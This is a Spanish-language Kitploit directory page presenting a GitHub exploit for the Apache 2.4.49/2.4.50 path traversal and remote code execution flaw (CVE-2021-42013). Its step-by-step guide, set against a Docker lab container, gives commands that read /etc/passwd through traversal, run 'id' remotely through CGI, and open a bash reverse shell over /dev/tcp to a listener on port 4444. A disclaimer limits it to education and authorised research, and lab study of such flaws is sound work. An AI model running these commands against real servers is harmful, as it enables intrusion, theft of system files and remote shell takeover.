Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-42013 — Exploit para Apache 2.4.49/2.4.50 path traversal y RCE (CVE-2021-42013). Incluye configuración de Docker y script para probar path traversal, ejecutar comandos y obtener una reverse shell. | Kitploit
Herramientas/GitHubGitHub/asepsaepdin/cve-2021-42013
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso RemotoLabs y Práctica
GitHubasepsaepdin/cve-2021-42013

CVE-2021-42013

Exploit para Apache 2.4.49/2.4.50 path traversal y RCE (CVE-2021-42013). Incluye configuración de Docker y script para probar path traversal, ejecutar comandos y obtener una reverse shell.

Ver Repositorio
115hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-42013 - Apache 2.4.50 Path Traversal y Ejecución Remota de Código (RCE)


⚠️ Solo para fines educativos y de investigación de seguridad autorizada

Autores del Exploit Original

Muy agradecidos al autor original del PoC Walnut Security Services Pvt. Ltd

Descripción

Un atacante podría utilizar un ataque de path traversal para mapear URLs a archivos fuera de los directorios configurados por directivas tipo Alias. Si los archivos fuera de estos directorios no están protegidos por la configuración predeterminada habitual "require all denied", estas solicitudes pueden tener éxito. Si también se habilitan scripts CGI para estas rutas alias, esto podría permitir la ejecución remota de código. Este problema solo afecta a Apache 2.4.49 y Apache 2.4.50, no a versiones anteriores.


Guía de Pasos

  1. Primero, clona el repositorio

    git clone https://github.com/asepsaepdin/CVE-2021-42013.git
    
  2. Cambia de directorio

    cd CVE-2021-42013
    
  3. Construye el contenedor vulnerable

    docker build -t CVE-2021-42013 .
    
  4. Ejecuta el contenedor efímero

    docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
    
  5. Verifica la dirección IP del contenedor

    docker inspect CVE-2021-42013 | grep "IPAddress"
    
  6. Otorga permiso de ejecución al script

    chmod +x cve-2021-42013.sh
    
  7. Para probar y confirmar el path traversal, es necesario descubrir un directorio válido, que en este caso está configurado como /icons. Por lo tanto, ejecutar el siguiente comando desencadenará la vulnerabilidad de path traversal e imprimirá el contenido de /etc/passwd:

    ./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
    
  8. Para probar y confirmar la ejecución remota de código, CGI debe estar configurado y habilitado, lo cual en este caso es cierto. Por lo tanto, ejecutar el siguiente comando desencadenará la ejecución remota de código e imprimirá la salida del comando id:

    ./cve-2021-42013.sh 172.17.0.3 /bin/bash id
    
  9. Desde la perspectiva de un atacante, la ejecución remota de código es crítica para obtener acceso a un shell interactivo. Por lo tanto, ejecutar el siguiente comando desencadenará una reverse shell convencional sobre tcp basada en bash hacia el sistema del atacante en el puerto 4444/tcp:

    ./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
    
    nc -nlvp 4444
    

Créditos

  • https://github.com/walnutsecurity/cve-2021-42013
  • https://nvd.nist.gov/vuln/detail/CVE-2021-42013
  • https://www.exploit-db.com/docs/50552
  • https://www.exploit-db.com/exploits/50406
Descargar herramienta